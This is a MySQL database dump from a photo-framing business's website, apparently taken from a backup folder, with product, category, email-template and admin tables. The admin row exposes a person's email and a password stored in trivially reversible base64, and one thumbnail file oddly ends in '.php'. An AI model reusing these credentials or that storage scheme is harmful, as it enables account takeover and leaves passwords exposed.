File: //backup/db_backup/paulgrah_digitaldb.sql
-- MySQL dump 10.15 Distrib 10.0.34-MariaDB, for Linux (x86_64)
--
-- Host: localhost Database: paulgrah_digitaldb
-- ------------------------------------------------------
-- Server version 10.0.34-MariaDB
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `tbl_admin`
--
DROP TABLE IF EXISTS `tbl_admin`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `tbl_admin` (
`admin_id` bigint(10) NOT NULL AUTO_INCREMENT,
`admin_name` varchar(255) NOT NULL,
`admin_email` varchar(255) NOT NULL,
`admin_helpdesk_email` varchar(255) DEFAULT NULL,
`admin_username` varchar(255) DEFAULT NULL,
`admin_pwd` varchar(255) NOT NULL,
`records_per_page` int(5) NOT NULL,
`is_active` enum('Y','N') NOT NULL DEFAULT 'N',
`last_modified` datetime DEFAULT NULL,
PRIMARY KEY (`admin_id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `tbl_admin`
--
LOCK TABLES `tbl_admin` WRITE;
/*!40000 ALTER TABLE `tbl_admin` DISABLE KEYS */;
INSERT INTO `tbl_admin` VALUES (1,'Paul Graham','mail@paulgrahamltd.com','mail@paulgrahamltd.com','Paul Graham','c3R1ZGlv',50,'Y','2011-09-29 14:03:36');
/*!40000 ALTER TABLE `tbl_admin` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `tbl_ads`
--
DROP TABLE IF EXISTS `tbl_ads`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `tbl_ads` (
`AdsID` int(18) NOT NULL AUTO_INCREMENT,
`Title` varchar(255) DEFAULT NULL,
`Price` float(18,2) DEFAULT NULL,
`PriceFrequency` varchar(255) DEFAULT NULL,
`PriceOptions` varchar(255) DEFAULT NULL,
`PriceNotes` text,
`Content` text,
`UserID` int(18) DEFAULT NULL,
`LocationID` int(18) DEFAULT NULL,
`MainLocationID` int(18) DEFAULT NULL,
`CategoryID` int(18) DEFAULT NULL,
`ClassificationID` int(18) DEFAULT NULL,
`Tags` varchar(255) DEFAULT NULL,
`Options` varchar(255) DEFAULT NULL,
`ShowPhone1` char(1) DEFAULT 'N',
`ShowPhone2` char(1) DEFAULT 'N',
`ShowMobile` char(1) DEFAULT NULL,
`ShowSpamText` char(1) DEFAULT 'N',
`ShowEmail` char(1) DEFAULT 'N',
`ShowAd` char(1) DEFAULT 'Y',
`Reviewed` char(1) DEFAULT 'N',
`Approved` char(1) DEFAULT 'N',
`PendingForApproval` char(1) DEFAULT 'Y',
`NearestTown` varchar(255) DEFAULT NULL,
`PostCode` varchar(20) DEFAULT NULL,
`latitude` float DEFAULT NULL,
`logitude` float DEFAULT NULL,
`NoOfViews` int(18) DEFAULT '0',
`SearchPostcode` varchar(20) DEFAULT NULL,
`DisapprovalReason` varchar(255) DEFAULT NULL,
`ExpiryDate` datetime DEFAULT NULL,
`AdsStatus` char(1) DEFAULT 'Y',
`PriceOpinion` varchar(255) DEFAULT NULL,
`PriceStatusId` int(18) DEFAULT NULL,
`PriceOptionID` int(18) DEFAULT NULL,
`SecurityCode` varchar(20) DEFAULT NULL,
`PostIPAddress` varchar(50) DEFAULT NULL,
`ReasonForSuspension` varchar(100) DEFAULT NULL,
`AddedOn` datetime DEFAULT NULL,
`LastModifiedDate` datetime DEFAULT NULL,
PRIMARY KEY (`AdsID`),
UNIQUE KEY `UserID` (`UserID`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `tbl_ads`
--
LOCK TABLES `tbl_ads` WRITE;
/*!40000 ALTER TABLE `tbl_ads` DISABLE KEYS */;
/*!40000 ALTER TABLE `tbl_ads` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `tbl_category_master`
--
DROP TABLE IF EXISTS `tbl_category_master`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `tbl_category_master` (
`category_id` bigint(10) NOT NULL AUTO_INCREMENT,
`category_name` varchar(255) DEFAULT NULL,
`thumb_image_name` varchar(255) DEFAULT NULL,
`main_image_name` varchar(255) DEFAULT NULL,
`is_active` enum('Y','N') DEFAULT NULL,
`added_on` datetime DEFAULT NULL,
`sort_order` bigint(12) DEFAULT NULL,
PRIMARY KEY (`category_id`)
) ENGINE=InnoDB AUTO_INCREMENT=23 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `tbl_category_master`
--
LOCK TABLES `tbl_category_master` WRITE;
/*!40000 ALTER TABLE `tbl_category_master` DISABLE KEYS */;
INSERT INTO `tbl_category_master` VALUES (1,'Ultimate Acrylics','CAT_THUMB_1.jpg','CAT_MAIN_1.jpg','Y',NULL,1),(2,'Framing','CAT_THUMB_2.jpg','CAT_MAIN_2.jpg','Y',NULL,2),(3,'Canvas Wraps','CAT_THUMB_3.jpg','CAT_MAIN_3.jpg','Y',NULL,3),(4,'Studio Makeover Package','CAT_THUMB_4.jpg','CAT_MAIN_4.jpg','N',NULL,12),(5,'Image Enhancement','CAT_THUMB_5.php','CAT_MAIN_5.jpg','Y',NULL,11),(6,'Printing & Mounting','CAT_THUMB_6.jpg','CAT_MAIN_6.jpg','Y',NULL,9),(7,'Pop-Up Roller Banners','CAT_THUMB_7.jpg','CAT_MAIN_7.jpg','Y',NULL,6),(8,'Display Systems','CAT_THUMB_8.jpg','CAT_MAIN_8.jpg','Y',NULL,7),(9,'Corporate Visual Solutions','CAT_THUMB_9.jpg','CAT_MAIN_9.jpg','Y',NULL,8),(10,'Wedding Albums','CAT_THUMB_10.jpg','CAT_MAIN_10.jpg','Y',NULL,5),(21,'Your Fusion','CAT_THUMB_21.jpg','CAT_MAIN_21.jpg','Y',NULL,4),(22,'Scanning','CAT_THUMB_22.jpg','CAT_MAIN_22.jpg','Y',NULL,10);
/*!40000 ALTER TABLE `tbl_category_master` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `tbl_etemplate_master`
--
DROP TABLE IF EXISTS `tbl_etemplate_master`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `tbl_etemplate_master` (
`etype_id` bigint(10) NOT NULL AUTO_INCREMENT,
`etemplate_title` varchar(255) DEFAULT NULL,
`etemplate_subject` text,
`from_email` varchar(255) DEFAULT NULL,
`etemplate_header` text,
`etemplate_body` text,
`etemplate_footer` text,
`etemplate_color` varchar(255) DEFAULT NULL,
`etemplate_bgcolor` varchar(255) DEFAULT NULL,
`added_on` datetime DEFAULT NULL,
`last_modified` timestamp NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (`etype_id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `tbl_etemplate_master`
--
LOCK TABLES `tbl_etemplate_master` WRITE;
/*!40000 ALTER TABLE `tbl_etemplate_master` DISABLE KEYS */;
INSERT INTO `tbl_etemplate_master` VALUES (1,'Forgot Password - Administrator','Authenticate the password','invitra.test@gmail.com','Forgot Password - Administrator','Below are login details','Regards,<br>\r\nAdmin','#FFFFFF','#F5E3EB','2009-09-02 10:56:26','2010-05-13 17:03:57'),(2,'Enquiry','<%FIRSTNAME%> has been uploaded enquiry with Paul Graham - image specialist.','invitra.test@gmail.com','Dear Admin,','Below are details :','Thanks and Regards,<br>\r\nPaul Graham - image specialist.','#FFFFFF','#F5E3EB','2009-10-06 15:35:40','2010-05-13 17:04:18'),(3,'Contact','<%FIRSTNAME%> has been submitted contact form with Paul Graham - image specialist.','invitra.test@gmail.com','Dear Admin,','Below are details :','Thanks and Regards,<br>\r\nPaul Graham - image specialist.','#FFFFFF','#F5E3EB','2010-05-14 18:10:30','2010-05-14 17:17:37');
/*!40000 ALTER TABLE `tbl_etemplate_master` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `tbl_image_master`
--
DROP TABLE IF EXISTS `tbl_image_master`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `tbl_image_master` (
`photo_id` bigint(11) NOT NULL AUTO_INCREMENT,
`user_ref_id` bigint(11) DEFAULT NULL,
`photo_image_name` varchar(255) DEFAULT NULL,
PRIMARY KEY (`photo_id`),
KEY `FK_tbl_image_master` (`user_ref_id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `tbl_image_master`
--
LOCK TABLES `tbl_image_master` WRITE;
/*!40000 ALTER TABLE `tbl_image_master` DISABLE KEYS */;
INSERT INTO `tbl_image_master` VALUES (1,1,'ART_1_1.jpg'),(2,2,'ART_2_2.jpg'),(3,2,'ART_2_3.jpg'),(5,4,'ART_4_5.jpg');
/*!40000 ALTER TABLE `tbl_image_master` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `tbl_photos_master`
--
DROP TABLE IF EXISTS `tbl_photos_master`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `tbl_photos_master` (
`photo_id` bigint(10) NOT NULL AUTO_INCREMENT,
`product_ref_id` bigint(10) DEFAULT NULL,
`photo_title` varchar(255) DEFAULT NULL,
`photo_image_name` varchar(255) DEFAULT NULL,
`is_active` enum('Y','N') DEFAULT 'Y',
`added_on` datetime DEFAULT NULL,
`modified_on` datetime DEFAULT NULL,
PRIMARY KEY (`photo_id`)
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `tbl_photos_master`
--
LOCK TABLES `tbl_photos_master` WRITE;
/*!40000 ALTER TABLE `tbl_photos_master` DISABLE KEYS */;
INSERT INTO `tbl_photos_master` VALUES (1,1,'photo 1','PROD_1_PHOTO_1.jpg','Y','2010-05-14 11:25:21',NULL),(2,2,'Acrylics 2','PROD_2_PHOTO_2.jpg','Y','2010-05-14 11:27:15',NULL),(3,3,'Framing1','PROD_3_PHOTO_3.jpg','Y','2010-05-14 11:30:23',NULL),(5,5,'Canvas Wraps 1','PROD_5_PHOTO_5.jpg','Y','2010-05-14 11:39:09',NULL),(6,4,'Framing2','PROD_4_PHOTO_6.jpg','Y','2010-05-14 12:49:13',NULL),(7,1,'photo2','PROD_1_PHOTO_7.jpg','Y','2010-05-14 15:02:41',NULL),(8,1,'photo 3','PROD_1_PHOTO_8.jpg','Y','2010-05-17 10:16:42',NULL),(9,5,'Canvas Wraps 2','PROD_5_PHOTO_9.gif','Y','2010-05-17 10:53:59',NULL),(10,6,'Canvas Wraps 3','PROD_6_PHOTO_10.jpg','Y','2010-05-17 10:54:52',NULL),(11,6,'Canvas Wraps image','PROD_6_PHOTO_11.jpg','Y','2010-05-17 10:55:46',NULL),(12,125,'roomset 1','PROD_125_PHOTO_12.jpg','Y','2013-02-07 09:30:22',NULL),(13,8,'test2','PROD_8_PHOTO_13.jpg','Y','2015-12-01 22:02:52',NULL),(14,8,'ss','PROD_8_PHOTO_14.jpg','Y','2015-12-02 01:03:16',NULL);
/*!40000 ALTER TABLE `tbl_photos_master` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `tbl_product_master`
--
DROP TABLE IF EXISTS `tbl_product_master`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `tbl_product_master` (
`ProductId` int(5) NOT NULL AUTO_INCREMENT,
`ProductLayout` varchar(100) DEFAULT 'Layout1',
`Category_ref_id` varchar(255) DEFAULT NULL,
`ProductTitle` varchar(255) DEFAULT NULL,
`ProductPagename` varchar(255) DEFAULT NULL,
`ProductMetatitle` text,
`ProductMetakey` text,
`ProductMetadescription` text,
`ProductDesc` text,
`ProductImage` varchar(255) DEFAULT NULL,
`ImageAltText` varchar(255) DEFAULT NULL,
`SubTitle1` varchar(255) DEFAULT NULL,
`SubDesc1` text,
`SubTitle2` varchar(255) DEFAULT NULL,
`SubDesc2` text,
`SubTitle3` varchar(255) DEFAULT NULL,
`SubDesc3` text,
`Is_active` char(1) DEFAULT 'Y',
`AddedOn` datetime DEFAULT NULL,
`LastModifiedOn` timestamp NULL DEFAULT CURRENT_TIMESTAMP COMMENT 'ON UPDATE CURRENT_TIMESTAMP',
`sort_order` bigint(12) DEFAULT NULL,
PRIMARY KEY (`ProductId`)
) ENGINE=InnoDB AUTO_INCREMENT=195 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `tbl_product_master`
--
LOCK TABLES `tbl_product_master` WRITE;
/*!40000 ALTER TABLE `tbl_product_master` DISABLE KEYS */;
INSERT INTO `tbl_product_master` VALUES (8,'Layout2','1','Chunki','acrylics-chunki.php','Chunki','Chunki','Chunki','','PROD_8.jpg','','The <span class=\'pinksmalltitle\'> Chunki</span>','<span lang=\"EN-GB\">\r\n<p><font size=\"2\"><strong><font color=\"#ec008c\">Uncompromisingly Attractive<br />\r\n<br />\r\n</font></strong>Outstandingly fresh and clean, the sleek lines and bold image panels achieve a luxurious and highly appealing combination.</font></p>\r\n</span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<font size=\"1\">(All measurements are in inches)</font><br />\r\n<br />\r\nAll prices are +vat<br />\r\n<br />\r\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\r\n <tbody>\r\n <tr>\r\n <td valign=\"top\" style=\"width: 100px\"><strong><font color=\"#ec008c\">Image</font> Size</strong></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 30x15</td>\r\n <td valign=\"top\"><br />\r\n <strong><font color=\"#ec008c\">£ 190+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 160+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x10</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 140+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">15x10</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 90+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">10x10</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 60+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font>','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font size=\"3\" color=\"#ec008c\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2015-12-01 21:53:13','2010-05-18 15:16:38',8),(9,'Layout2','1','old Designer','acrylics-designer.php','Designer','Designer','Designer','','PROD_9.jpg','','The <span class=\'pinksmalltitle\'> Designer</span>','<p><font size=\"2\"><font color=\"#ec008c\"><strong>Art or Architecture ?<br />\r\n<br />\r\n</strong></font><font color=\"#000000\">Our most innovative arrangement yet. Entering into a new frontier of image presentation.</font></font></p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"2\"><font size=\"1\">(All measurements are in inches)<br />\r\n</font><br />\r\n<font face=\"Courier New\"><font face=\"Arial\">All prices are + vat</font> <br />\r\n</font><br />\r\nThe Designer has been created to a set acrylic and <br />\r\nimage panel combination The AcrylicSizes are:<br />\r\n<br />\r\nVertical: 12x39<br />\r\nTop Horizontal: 31x12<br />\r\nBottom Horizontal: 41x14<br />\r\n<br />\r\nThe Image Panels are sized at: 20x16<br />\r\n<br />\r\n<strong><font color=\"#ec008c\">Price £ 480+vat</font></strong></font></p>','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2013-02-13 14:38:08','2010-05-18 15:19:10',9),(10,'Layout2','1','old Desktops','acrylics-desktops.php','Desktops','Desktops','Desktops','','PROD_10.jpg','','The <span class=\'pinksmalltitle\'> Desktops</span>','<p><span style=\"line-height: 115%; font-family: \'Calibri\',\'sans-serif\'; font-size: 10pt; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: \'Times New Roman\'; mso-bidi-theme-font: minor-bidi; mso-ansi-language: EN-GB; mso-fareast-language: EN-US; mso-bidi-language: AR-SA\" lang=\"EN-GB\"><font color=\"#ec008c\" face=\"Arial\"><strong>Individually Intimate<br />\r\n<br />\r\n</strong></font></span><span style=\"line-height: 115%; font-size: 10pt\">A lasting and personal object, the desktop is a perfect gift for families and loved ones. An enduring momento for your individual memories.</span></p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)<br />\r\n<br />\r\n</font>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 173px; height: 68px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><strong><font color=\"#ec008c\">Image</font> Size</strong></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n Desktop</td>\r\n <td valign=\"top\"><br />\r\n <font color=\"#ec008c\"><strong>£ 18+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">Desktower</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 33+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n</p>','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2013-02-13 14:38:33','2010-05-18 15:20:59',10),(11,'Layout2','1','Duo','acrylics-duo.php','Duo','Duo','Duo','','PROD_11.jpg','','The <span class=\'pinksmalltitle\'> Duo</span>','<p><font size=\"2\"><font color=\"#ec008c\"><strong>Clear Brilliance<br />\r\n<br />\r\n</strong></font>A magnificently clean cut concept in total high gloss - truly a piece of accent art!</font></p>\r\n<div style=\"margin: 0cm 0cm 10pt\"><font size=\"2\"> </font></div>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\"><font size=\"2\">(All measurements are in inches)<br />\r\n<br />\r\n</font>\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"170\" height=\"99\">\r\n <tbody>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\"><strong>Size</strong></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n <font size=\"2\">50x18 </font></td>\r\n <td valign=\"top\"><br />\r\n <font color=\"#ec008c\" size=\"2\"><strong>£265+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\" colspan=\"2\"><font size=\"1\">Image Panels (15x15 & 22x5)</font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\" colspan=\"2\"><font size=\"2\"> </font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">40x15 </font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£215+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\" colspan=\"2\"><font size=\"1\">Image Panels (12x12 & 18x4)</font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n</font></p>','Available <span class=\'pinksmalltitle\'> Colours</span>','<p>This product is only available in black.</p>','N','2011-03-29 12:16:11','2010-05-18 15:22:22',11),(12,'Layout2','1','old Flush','acrylics-flush.php','Flush','Flush','Flush','','PROD_12.jpg','','The <span class=\'pinksmalltitle\'> Flush</span>','<font color=\"#ec008c\"><span lang=\"EN-GB\">\r\n<p><font size=\"2\"><strong>Seamless, Sleek and Stylish</strong><br />\r\n<br />\r\n</font></p>\r\n</span></font><font color=\"#000000\"><font size=\"2\"><span lang=\"EN-GB\">Stylish, frameless and ultra modern, the Flush has an edge to edge mounted image and features colour co-ordinated profiles. The ultimate in minimalist presentation.</span></font></font>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<font size=\"1\">(All measurements are in inches)<br />\r\n<br />\r\n</font>All prices are +vat<br />\r\n<br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><strong><font color=\"#ec008c\">Image</font> Size</strong></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 30x20</td>\r\n <td valign=\"top\"><br />\r\n <strong><font color=\"#ec008c\">£ 120+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x24</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 120+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 100+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 100+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 90+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x10</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 90+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n <br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font>','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2013-02-13 14:37:29','2010-05-18 15:23:33',12),(13,'Layout2','1','Jigsaw','acrylics-jigsaw.php','Jigsaw','Jigsaw','Jigsaw','','PROD_13.jpg','','The <span class=\'pinksmalltitle\'> Jigsaw</span>','<font color=\"#ec008c\" size=\"2\"><span lang=\"EN-GB\">\r\n<p><strong>In Perfect Harmony<br />\r\n<br />\r\n</strong></p>\r\n</span></font><font size=\"2\"><span lang=\"EN-GB\">It\'s not puzzling to see why this is such a popular piece. Perfect balance and placement of five separate images give a truly magnificent focal point.</span> </font>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)<br />\r\n</font><br />\r\nThe Jigsaw has been designed to a set acrylic and image size combination.<br />\r\n<br />\r\nThe Acrylic Sizes are:<br />\r\n<br />\r\n(From Largest to Smallest)</p>\r\n<p>20x20, 16x16, 10x10, 15x5, 8x8.<br />\r\n<br />\r\n<font color=\"#ec008c\"><strong>Price £310+vat</strong></font></p>','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2011-03-29 12:04:40','2010-05-18 15:24:26',13),(14,'Layout2','1','Levels','acrylics-levels.php','Levels','Levels','Levels','','PROD_14.jpg','','The <span class=\'pinksmalltitle\'> Levels</span>','<font color=\"#ec008c\" size=\"2\"><span lang=\"EN-GB\">\r\n<p><strong>Staggeringly Different<br />\r\n<br />\r\n</strong></p>\r\n</span></font><span lang=\"EN-GB\"><font size=\"2\">Nine image panels and three height levels allow you to create a truly 3 dimensional image.</font></span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<br />\r\nThe Levels has been designed to a set acrylic and image size combination. <br />\r\n<font size=\"1\"><br />\r\n</font>The Acrylic Sizes is: 30x30<br />\r\nEach Image Size is: 6x6<br />\r\n<br />\r\n<font color=\"#ec008c\"><strong>Price £215+vat</strong></font></p>\r\n<p> </p>','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2010-06-10 09:20:41','2010-05-18 15:25:27',14),(15,'Layout2','1','Multi','acrylics-multi.php','Multi','Multi','Multi','','PROD_15.jpg','','The <span class=\'pinksmalltitle\'> Multi</span>','<span lang=\"EN-GB\"><font color=\"#ec008c\"><span lang=\"EN-GB\">\r\n<p><font size=\"2\"><strong>Striking Modern Wall Art</strong><br />\r\n<br />\r\n</font></p>\r\n</span></font><span lang=\"EN-GB\"><font size=\"2\">Showcasing the presentation of images in three levels. Colour co-ordination and arrangement are key elements. The Avant-Garde design creates a magnificent \'one of a kind\' piece of accent art.</font></span></span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font></p>\r\n<p>Due to its intricate design, the \'Multi\' only has one set image size and acrylic combination. The set sizes of the image panels are:</p>\r\n<p>Main Square: 10x10<br />\r\nHorizontal Panel: 23x5<br />\r\nVertical Panel: 25x4.5<br />\r\n<br />\r\n<strong><font color=\"#ec008c\">Price £195+vat</font></strong></p>','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2010-06-08 11:19:00','2010-05-18 15:26:41',15),(16,'Layout2','1','Overhang','acrylics-overhang.php','Overhang','Overhang','Overhang','','PROD_16.jpg','','Overhang','<font color=\"#ec008c\" size=\"2\"><span lang=\"EN-GB\">\r\n<p><strong>Dare to be Different !<br />\r\n<br />\r\n</strong></p>\r\n</span></font><span lang=\"EN-GB\"><font size=\"2\">Breaking all the rules, this concept allows the image to go beyond the boundaries of the frame, creating a simple but very effective delivery.</font></span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<font size=\"1\">(All measurements are in inches)<br />\r\n<br />\r\n</font>All prices are +vat<br />\r\n<br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><strong><font color=\"#ec008c\">Image</font> Size</strong></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 36x16</td>\r\n <td valign=\"top\"><br />\r\n <strong><font color=\"#ec008c\">£ 190+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 190+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x24</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 190+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 160+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 160+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 140+vat</font></strong></td>\r\n 